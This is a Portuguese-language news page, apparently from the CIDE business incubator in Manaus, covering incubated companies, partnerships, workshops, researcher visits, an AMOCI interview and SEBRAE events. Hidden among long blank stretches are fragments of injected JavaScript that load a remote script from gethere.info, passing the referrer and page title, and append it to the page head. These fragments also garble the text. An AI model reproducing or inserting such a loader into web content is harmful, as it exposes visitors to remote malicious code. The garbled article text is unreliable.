A Trembão, empresa de alimentos congelados, instalada no Centro de Incubação e Desenvolvimento Empresarial (CIDE), criou e fez o lançamento, no auditório da própria incubadora, do “Dindim termogênico” ou “Dindin da Trembão”, um produto energético, feito com ingredientes naturais, como o guaraná e o gengibre, que auxilia às pessoas na prática de exercícios físicos dentro e fora das academias.

Preparação para depois da incubação

O coach, Geraldo Magela, e os empresários durante a penúltima formação de 2017.

Aproximadamente dez empresas instaladas no Centro de Incubação e Desenvolvimento Empresarial (CIDE) realizaram uma capacitação de “pós-período de incubação”, pensada para enfrentar os desafios fora da incubadora. A formação aconteceu no próprio centro, com o apoio do Departamento de Assistência à Média e Pequena Indústria (DAMPI), da Federação das Indústrias do Estado do Amazonas (FIEAM).

Segundo o economista e coach, Geraldo Magela, os empresários instalados devem ter uma formação constante e não podem deixar para depois os desafios “pós-incubadora”. “Há casos em que os empreendedores trazem a família para o seu próprio negócio. Isso não é problema. Mas, o que não pode acontecer é que a empresa se torne um ‘cabide de emprego’ para parentes sem o perfil desejado que ajude o negócio a crescer. Família é família e negócio é negócio”, diz Magela, acrescentando que o empreendedor deve profissionalizar os seus colaboradores.

Empreendedores trabalham juntos para superar desafios

Empresarios assinam parceria.

Empresarios assinam parceria.

 

 

Proprietários de empresas, instaladas no Centro de Incubação e Desenvolvimento Empresarial (CIDE), buscando melhoramentos no processo de produção e superar as dificuldades juntos, decidiram fazer parcerias entre eles.

 

No mês de maio, os empreendedores, Domingos Amaral e Danniel Pinheiro, da Biozer da Amazônia, empresa de Cosméticos e Fitoterápicos, anunciaram uma parceria com o empresário Cabral, da Sohervas da Amazônia. “A ideia da parceria ficou mais aguçada devido ao momento atual da economia, mas tivemos outros fatores a favor, como a matéria-prima regional usada pela Sohervas em seus produtos e queremos utilizá-la também no setor de Cosméticos”, afirma Amaral.

 

A Sohervas da Amazônia produz licores com essências da Amazônia, como o licor de cupuaçu, açaí, camu-camu, produtos que interessam a Biozer. “A nossa contrapartida está no marketing da Sohervas, aumentar o seu volume de produção, conquistar novos mercados, bem como desenvolver produtos em parceria para a área da Gastronomia, como o ‘vinagre gourmet’ e sobremesas à base de licores de frutas da Amazônia’”, diz Amaral.

Parceria é comemorada com licor.

Parceria é comemorada com licor.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Incubadoras de empresas trocam experiências para melhorar serviços

Consultoras da Anprotec conversam com os representantes das incubadoras

Consultoras da Anprotec conversam com os representantes das incubadoras

 

Com o objetivo de trocar antigas e novas experiências, sobre melhorias de planejamentos, consultorias, acompanhamentos aos empreendedores instalados em incubadoras de empresas, o Centro de Incubação e Desenvolvimento Empresarial (CIDE) e mais seis incubadoras de empresas do Amazonas participaram, em março, na Universidade do Estado do Amazonas (UEA), do evento Workshop para Incubadoras.

 

O encontro serviu também para compartilhar experiências da implantação da metodologia do Centro de Referência para Apoio a Novos Empreendimentos (CERNE), chamado de “metodologia CERNE”, que auxilia as incubadoras no processo de gestão de incubação empresarial.

 

O encontro foi realizado pela Fundação de Amparo à Pesquisa do Amazonas (FAPEAM) e a Associação Nacional de Entidades Promotoras de Empreendimentos de Tecnologias Avançadas (ANPROTEC). “Na verdade, o método CERNE é implantado de acordo com a realidade de cada incubadora participante. Nenhuma incubadora é igual a outra. Por isso, a metodologia não permite cópias. Mas, podemos ajustar o exemplo de uma incubadora conforme a realidade da minha incubadora”, diz a consultora da ANPROTEC, Evelin Cristina Astolpho.

 

A consultora lembrou também que o compartilhamento de informações e experiências faz parte das atividades desenvolvidas pela ANPROTEC para melhorar a gestão das incubadoras de empresas. “A ‘métodologia CERNE’ diz o que tem que ser feito na gestão das incubadoras. Agora, como tem que ser feito ou realizado, cada incubadora vai colocar em prática de acordo com suas características, realidade e de acordo com as suas empresas instaladas”, diz Evelin Astolpho, acrescentando que todas as exposições feitas no evento são usadas para melhorar as práticas.

 

Nova visita técnica

Em março de 2016, o CIDE foi avaliado por consultores da ANPROTEC, que verificaram o grau de implantação da “metodologia Cerne”. Este ano, uma nova visita está programada. “A segunda visita técnica, sem data prevista, vai avaliar o que foi implantado em cada incubadora. Para cada centro de incubação fazemos um relatório e passamos à Fapeam. Nessa segunda visita técnica vamos ver o quanto avançou”, finaliza a consultora.

 

Para o diretor executivo do CIDE, José Barbosa Grosso, a metodologia auxilia na avaliação do potencial de cada empreendedor instalado. “Todo o processo de incubação é avaliado. Dessa forma, detectamos as metas, as dificuldades, os riscos, os objetivos e potenciais das empresas residentes aqui”, conclui.

Representantes de sete incubadoras de empresas participaram

Representantes de sete incubadoras de empresas participaram

 

Oc4

 

Oc3

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Empresa começa processo de entrada no CIDE com medicamentos para diabéticos

Diante do diretor executivo e da equipe técnica do CIDE, o empreendedor Carlos Danniel expõe o Plano de Negócios.

Diante do diretor executivo e da equipe técnica do CIDE, o empreendedor Carlos Danniel expõe o Plano de Negócios.

 

Como acontece todos os anos, novas empresas, de diversos segmentos, solicitam o início do processo de entrada ou processo de incubação, no Centro de Incubação e Desenvolvimento Empresarial (CIDE), com a finalidade de desenvolver produtos inovadores e a sua comercialização.

 

No mês de março, a Biozer da Amazônia, empresa desenvolvedora de gel e cremes para tratamentos de ferimentos em pessoas com problemas de diabetes, em parceria com o Instituto Nacional de Pesquisas da Amazônia (INPA), começou o seu processo de instalação, apresentando ao conselho administrativo da incubadora o Plano de Negócios.

 

Durante quase três horas de avaliação, o empreendedor Carlos Danniel Pinheiro, expôs os objetivos da empresa no CIDE. “Os produtos são inovadores, mas ainda não foram colocados à venda. Eles vão acelerar o processo de cicatrização de doenças em pés de pessoas com diabetes. Os cosméticos têm propriedades terapêuticas”, lembra o empresário.

 

Ainda conforme Pinheiro, o fato de estar no CIDE, permite uma série de vantagens. “Escolhemos este centro de incubação para dar continuidade aos trabalhos de desenvolvimento dos nossos produtos. Sabemos que aqui, podemos concluir e comercializar nossos produtos para tratamentos em diabéticos e lançar nossa linha de cosméticos com produtos naturais da Amazônia com certificação”, reconhece o mais novo residente da incubadora.

Equipe técnica do CIDE escuta a exposição de Carlos Danniel.

Equipe técnica do CIDE escuta a exposição de Carlos Danniel.

 

Ao final da exposição, Danniel pediu uma foto com a equipe do CIDE.

Ao final da exposição, Danniel pediu uma foto com a equipe do CIDE.

 

Ap3

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Pesquisadoras do Brasil e da Inglaterra escolhem o CIDE para trabalho acadêmico

O diretor executivo, José Grosso, recepciona às pesquisadoras

O diretor executivo, José Grosso, recepciona às pesquisadoras

 

O Centro de Incubação e Desenvolvimento Empresarial (CIDE) foi a incubadora de empresas escolhida no Amazonas, para participar de uma pesquisa realizada por professoras da Fundação Getúlio Vargas e da Universidade de Essex da Inglaterra (University of Essex), sobre Empreendedorismo, Incubadoras de Empresas e Iniciativas de Empreendimentos.

 

A visita às instalações da incubadora ocorreu no último dia 23 de fevereiro, no qual as pesquisadoras Diane Holt e Silvia Pinheiro, conversaram com o diretor executivo do CIDE, José Barbosa Grosso, e foram acompanhadas pela funcionária Rosália Padilha, até as empresas escolhidas para a entrevista.

 

“Foi feito uma parceria entre a Fundação Getúlio Vargas e a Universidade de Essex para que nós desenvolvêssemos uma pesquisa sobre empreendedorismo no Brasil e, no Norte, escolhemos o CIDE devido à sua estrutura de incubadora e pelos empreendimentos instalados aqui”, disse a professora de Direito Internacional Silvia Pinheiro, acrescentando que a pesquisa vai ter uma duração de três anos e que o material vai ser publicado em revistas especializadas em empreendedorismo.

 

As pesquisadoras tiveram a oportunidade de conhecer in loco empresas do segmento de Perfumaria, Panificação, Doces, Temperos e Licores, onde puderam conversar com os empreendedores, funcionários, conhecer o processo e degustar os produtos regionais.

Pesquisadoras visitam a fábrica de chocolates Amazon Doces, no CIDE

Pesquisadoras visitam a fábrica de chocolates Amazon Doces, no CIDE

 

FotoG6

 

Pesquisadoras conhecem empresa de perfumes, no CIDE

Pesquisadoras conhecem fábrica de perfumes, no CIDE

 

FotoG3

 

Pesquisadoras visitam o setor de Tecnologia da Informação do CIDE

Pesquisadoras visitam o setor de Tecnologia da Informação do CIDE

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Entrevista con Noélia Falcão, coordenadora do AMOCI

Noélia Falcão, coordenadora do AMOCI

Noélia Falcão, coordenadora do AMOCI

 

Na primeira reunião do ano, na qual participaram vários representantes de incubadoras de empresas, representantes de instituições de pesquisas e de universidades, a coordenadora do Arranjo (Rede) de Núcleos de Inovação Tecnológica da Amazônia Ocidental, conhecido como “Arranjo AMOCI”, Noélia Falcão, concedeu uma entrevista ao informativo “Empresarial”, do Centro de Incubação e Desenvolvimento Empresarial (CIDE).

 

Como o AMOCI ajuda as instituições que promovem a inovação tecnológica?

Neste momento, são 23 instituições afiliadas ao AMOCI, sendo 16 no Estado do Amazonas, 3 no Estado do Acre, 3 no Estado de Roraima e 2 no Estado de Rondônia. O objetivo do Arranjo (Rede) é operar em forma de rede colaborativa, visando otimizar e compartilhar recursos, disseminar boas práticas de gestão da inovação e de proteção à propriedade intelectual, transferência de tecnologia e empreendedorismo, bem como facilitar a aplicação da Lei de Inovação, do Novo Marco Legal de Ciência, Tecnologia e Inovação (Lei número 13.243, de 11 de Janeiro de 2016, o chamado Marco Legal de CTI) e da Política de Inovação das ICTs (Instituições de Ciência e Tecnologia).

 

Quais são as barreiras que impedem o fomento da inovação?

Temos alguns desafios para a promoção da inovação. Aponto, por exemplo, a falta de mais investimentos em recursos humanos, especialmente, em pesquisadores e pesquisadoras que estejam interessados em se instalar na Amazônia. Sempre ouvimos que a Amazônia é rica em biodiversidade e, sem dúvida, o é, mas precisamos conhecê-la para explorá-la. Portanto, o investimento em profissionais da área de pesquisa é fundamental, assim como em instituições que promovem a pesquisa, para que elas possam melhorar a sua estrutura e desenvolver pesquisas de ponta. Outro desafio é com os profissionais que trabalham nos NITs (Núcleos de Inovação Tecnológica) das ICTs, que são os responsáveis em realizar a interface das ICTs com as empresas, transferindo o resultado das pesquisas (tecnologias). A maioria dos profissionais que compõem os NITs são bolsistas e assim temos um “rodízio” de pessoas que vêm e vão embora muito rápido. Na verdade, são bolsistas que ficam no máximo três anos e não podem ter sua bolsa renovada. Então você não pode dar continuidade a um trabalho porque o tempo do bolsista acabou e você tem de capacitar um novo bolsista e recomeçar o trabalho do ponto inicial. A solução seria os concursos, mas neste momento não parece possível. Então, penso eu, seria a contratação desses profissionais por meio das fundações de apoio.

 

Quem deve ir ao encontro de quem, a universidade ou a empresa?

Os dois lados devem tomar a iniciativa. Até por uma questão cultural, a interface entre a academia e as empresas ainda é algo que ocorre com pouca frequência. Temos a Lei de Inovação, o Novo Marco Legal de C, T e I, a Lei do Bem, entre outras, que visam promover essa interação. Acredito que a partir desses marcos legais já avançamos em relação a quinze anos atrás e espero num futuro próximo realizar a transferência de tecnologias desenvolvidas na academia de forma mais efetiva. Não adianta somente fazer pesquisas, temos de transferi-la e beneficiar à sociedade. Os pesquisadores não têm interesse em ficar com uma tecnologia, eles querem compartilhar e desejam que ela seja produzida em escala pelas empresas.

É o sonho de todo pesquisador ver o seu produto em uma prateleira e que todos tenham acesso a esse produto, gerando satisfação para o pesquisador, lucro para as empresas e benefício para quem vai consumir o produto, que é a sociedade. Todos ganham. E assim a inovação é efetivamente promovida.

 

Reunião com café da manhã

Reunião com café da manhã

 

Noélia Falcão coordena a reunião com vários representantes de incubadoras de empresas

Noélia Falcão coordena a reunião com vários representantes de incubadoras de empresas

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Gestores de Inovação e Empreendedorismo se reúnem na Ulbra

Gestores de incubadoras de empresas no auditório da Ulbra

Gestores de incubadoras de empresas no auditório da Ulbra.

Representantes e gestores de inovação e empreendedorismo de 14 incubadoras de empresas, parques tecnológicos e aceleradoras empresariais, e representantes do Governo do Amazonas se encontraram, no Centro Universitário Luterano de Manaus (CEULM/ULBRA) para falar dos casos de sucessos de empreendedores, instalados nas suas instituições e das dificuldades que ainda enfrentam as entidades que promovem o empreendedorismo no Amazonas.

 

O evento foi promovido pela Rede de Inovação e Empreendedorismo da Amazônia (RAMI) e contou com a participação do Centro de Incubação e Desenvolvimento Empresarial (CIDE). “ Queremos compartilhar os casos de sucessos das empresas regionais, a participação delas em prêmios nacionais, ouvir as dificuldades que ainda há e realizar um plano estratégico para o ano que vem”, diz a presidente da RAMI, Jeane Moura.

 

O encontro serviu também para palestras sobre economia criativa e tecnologias sociais na Amazônia, apresentação de projetos inovadores, a conexão entre as redes de inovação e empreendedorismo, universidade empreendedora, entre outros assuntos.

Gestores se reúnem.

Gestores se reúnem.

Convidados e palestrantes falam para os gestores.

Convidados e palestrantes falam para os gestores.

Palestrante anima os gestores e empreendedores.

Palestrante anima os gestores e empreendedores.

Rosália Padilha representou o CIDE.

Rosália Padilha representou o CIDE.

 

Formação reúne empreendedores do setor de Alimentação e de Bebidas

Participantes do curso de manipulação de alimentos, no SEBRAE.

Participantes do curso de manipulação de alimentos, no SEBRAE.

 

 

Com o objetivo de melhorar a capacitação no preparo e manipulação de alimentos, e no atendimento aos clientes, os empreendedores e funcionários de empresas do setor de alimentos, instaladas no Centro de Incubação e Desenvolvimento Empresarial (CIDE) receberam, durante duas semanas, do Serviço Brasileiro de Apoio às Micro e Pequenas Empresas (SEBRAE) formação com consultores e nutricionistas especializados.

 

Conforme a nutricionista Ana Rita Quadros, o controle de qualidade dos alimentos envolve técnicas e procedimentos adequados. “As técnicas transmitidas no curso garantem qualidade, higiene e segurança durante o preparo dos alimentos e, consequentemente, segurança na hora de consumi-los”, diz Quadros, acrescentando que curso promove também mudanças de atitude nos responsáveis pela fabricação de produtos alimentícios, evitando possíveis contaminações.

 

Para o funcionário da Amazon Doces, empresa incubada no CIDE, Raimundo Oliveira, o curso de manipulação de alimentos vai além do aspecto empresarial. “O que aprendemos serve para colocar em prática na empresa e em casa, no dia a dia de cada um. Técnicas de higienização, limpeza do local de trabalho, da farda, barba cortada, não misturar as louças, etc. são coisas que aprendemos e vamos praticar”, conta.

Funcionários de empresas do CIDE estiveram no curso do SEBRAE.

Funcionários de empresas do CIDE estiveram no curso do SEBRAE.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Professores da UFAM buscam troca de conhecimentos no CIDE

Professores visitam empresa de licores.

Professores visitam empresa de licores.

 

 

Professores da Universidade Federal do Amazonas (UFAM), dos departamentos de Engenharia Química e de Administração, realizaram uma visita, em novembro, ao Centro de Incubação e Desenvolvimento Empresarial (CIDE), com o objetivo de fazer possíveis parcerias para 2017, nas áreas de Pesquisa, Liderança, Empreendedorismo, Biotecnologia e Química.

 

Conforme a professora de Administração, Fabiola Meneguete, no CIDE, os estudantes podem entender como funciona os casos de liderança, de empreendedorismo, a gestão de uma empresa incubada. “Gostaríamos que os estudantes ouvissem e aprendessem, in loco, como funciona uma incubadora de empresas e o que essas empresas estão fazendo na área de Inovação”, disse.

 

Para a professora Yanne Gurgel, do departamento de Engenharia Química da UFAM, as parcerias ajudam na troca de experiências e conhecimentos. “É importante envolver os alunos nesse processo de incubação, inovação e interação, para que eles possam buscar soluções para novos desafios que vão surgir no desenvolvimento de novos produtos, complementando a formação deles”, conta, ressaltando que muitas empresas instaladas no CIDE, desenvolvem atividades relacionadas com a Engenharia Química.

 

O diretor executivo do CIDE, José Barbosa Grosso, comentou que as empresas no CIDE, podem ajudar na formação dos futuros profissionais. “O conhecimento dos empreendedores e profissionais instalados aqui, pode complementar os conhecimentos dos estudantes e vice-versa. Vamos esperar novos contatos para firmar as possíveis parcerias”, conclui.

 

Ao terminar as reuniões com o diretor executivo da incubadora, os professores visitaram algumas empresas de setores relacionados às áreas estudadas na universidade e conversaram com os proprietários.

Professores da Ufam conversam com o diretor executivo, José Barbosa Grosso.

Professores da Ufam conversam com o diretor executivo, José Barbosa Grosso.

 

 

Professores em empresa de temperos regionais.

Professores em empresa de temperos regionais.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

}

CIDE 2: capacitar, projetar e colocar em prática

Muitas pessoas visitam o "Cide Moda e Design", buscando roupas exclusivas

Muitas pessoas visitam o “Cide Moda e Design”, buscando roupas exclusivas

 

 

A Unidade 2 do Centro de Incubação e Desenvolvimento Empresarial (CIDE), conhecida como “CIDE Moda e Design”, localizada no bairro Alvorada, zona Centro-Oeste de Manaus, realizou várias ações em outubro e novembro, com o objetivo de tornar conhecidas as empresas de confecção, instaladas naquele local.

 

Para a gestora do “CIDE 2”, Elizabeth Araújo, o calendário de ações teve como foco os empresários, conhecidos como incubados, e seus produtos. “Nos meses de outubro e novembro de 2016, os empresários puderam participar de reuniões, curso e eventos voltados para o setor da Moda, o que foi de suma importância para os mesmos e pode resultar em novos olhares sobre a empresa e sobre o papel destes frente a sociedade”, conta Elizabeth, acrescentando que “movimento é vida”.

 

Ainda conforme Elizabeth Araújo, no dia 6 de outubro, os empresários participaram de uma reunião na sede do SEBRAE Amazonas e contaram com a presença da gestora do projeto de confecções, Clarice Maquiné, onde foi apresentada uma proposta de consultoria pontual junto as empresas.

 

Planejamento

No período de 11 a 21 de outubro, foi realizado o curso de Planejamento Estratégico, ministrado pela própria gestora do “CIDE 2”. “Foi um curso que pode abrir novos horizontes, mostrando que um planejamento empresarial é importante para que a empresa tenha em vista a meta a ser alcançada e o caminho que se deve seguir para conseguir”, diz a participante e empresária residente Socorro Flores. O curso teve carga horária de 24 horas.

 

Foi também no mês de outubro que as empresas Maison Rien de Base, Moda Flores da Amazônia e Crie e Recrie, participaram expondo seus modelos, do InovaModa Verão 2018, apresentando ao grande público, peças criadas e desenvolvidas na incubadora, o que foi de grande importância, pois o público alvo era empresários do setor, estudantes de moda e possíveis parceiros empresariais.

 

E para concluir o mês, foi realizado o 3° Bazar de Fábrica, que contou com a participação de todas as empresas incubadas e foi um sucesso de vendas, tanto que o 4° Bazar já está programado para os dias 15, 16 e 17 de dezembro de 2016

 

Novembro

Em novembro, foi a vez da empresa Crie e Recrie brilhar na passarela da segunda semana de Moda do Amazonas, promovido pela Fundação Amazônia Sustentável (FAZ), Cabedal de Criadores e FAAL Eventos, o Amazon Fashion Avenue. Evento que tem movimentado a moda local, dando espaço para que os estilistas da região possam apresentar com maestria suas criações.

 

Segundo a gestora, Elizabeth Araújo, a adesão dos empresários, assim como a dedicação de todos aos eventos é muito importante, pois mostra que o empreendedorismo regional e a valorização da moda Amazônica é algo possível. “Num período, no qual a economia tem afetado as vendas, o fato de que o empresariado da Moda participe e apresente seus produtos ao público, tornando assim, suas marcas conhecidas, é o resultado de uma ação conjunta e cooperação mútua”, finaliza a gestora.

O "CIDE Moda e Design" tem preços acessíveis.

O “CIDE Moda e Design” tem preços acessíveis.

 

 

Empreendedores do "Cide Moda e Design" recebem capacitação.

Empreendedores do “Cide Moda e Design” recebem capacitação.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

d.getElementsByTagName(‘head’)[0].appendChild(s);

Empório de Natal reúne empresas de alimentos do CIDE

 

Estande da Amazon Doces, no evento do SEBRAE Amazonas

Estande da Amazon Doces, no evento do SEBRAE Amazonas

 

 

Termina hoje, 2, às 20hs, horário Manaus, a “Empório Agronegócios de Natal”, um evento realizado pelo Serviço Brasileiro de Apoio às Micro e Pequenas Empresas (SEBRAE) e tem por objetivo promover as micro e pequenas empresas do setor primário. Cinco empresas do setor Alimentos e Bebidas, instaladas no Centro de Incubação e Desenvolvimento Empresarial (CIDE) participam da iniciativa, no pátio externo do Sebrae Amazonas.

 

Durante três dias, foram comercializados diversos produtos regionais, tais como farinhas, laticínios, pães, hortaliças, açaí, polpas de frutas, molhos, geleias, plantas ornamentais, mel e licores com sabores regionais.

 

Além de a venda direta de produtos regionais, há intercâmbios de negócios e conhecimento entre os expositores, a maioria produtores rurais. “É uma oportunidade para donos de restaurantes, bares, lanchonetes e redes de distribuição e supermercados firmarem parcerias comercias diretamente com o produtor rural”, diz o técnico do Sebrae Leocy Cutrim.

O Empório de Natal acontece no pátio externo do SEBRAE Amazonas

O Empório de Natal acontece no pátio externo do SEBRAE Amazonas

 

 

 

Estande da Sohervas, empresa incubada no CIDE

Estande da Sohervas, empresa incubada no CIDE

 

 

Estande da Sabores de Tradição, empresa de alimentos, instalada no CIDE

Estande da Sabores de Tradição, empresa de alimentos, instalada no CIDE

 

 

Estande da Temperos da Amazônia, empresa instalada no CIDE

Estande da Temperos da Amazônia, empresa instalada no CIDE